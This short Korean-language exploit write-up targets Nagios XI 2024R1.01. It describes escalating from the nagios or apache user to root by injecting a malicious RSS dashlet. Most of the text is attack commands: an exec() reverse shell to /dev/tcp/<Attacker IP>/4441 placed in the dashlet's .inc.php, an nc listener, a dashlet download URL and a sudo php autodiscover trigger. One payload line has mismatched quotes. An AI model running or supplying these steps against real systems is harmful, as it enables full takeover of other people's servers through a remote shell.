
Nagios XI 2024R1.01을 위한 권한 상승 익스플로잇으로, 악성 RSS 대시렛 인젝션 및 sudo 명령어 실행을 통해 NAGIOS 또는 APACHE 사용자로부터 전체 루트 액세스를 가능하게 합니다.
CVE 발견자: K. Wahab (Neo`X)
RSS Dashlet이 이 예제에서 사용됩니다.
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
nc -nlvp 4441
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
"dashlets" 관리 페이지로 이동하여 Dashlet을 다운로드합니다:
http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
*.inc.php 파일을 수정합니다:
exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");

nc -nlvp 4441
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
(참고: 명령 실행 후 APACHE로 연결을 받게 됩니다. CTRL+C를 눌러 종료하고 리스너를 여러 번 다시 시작하십시오.)
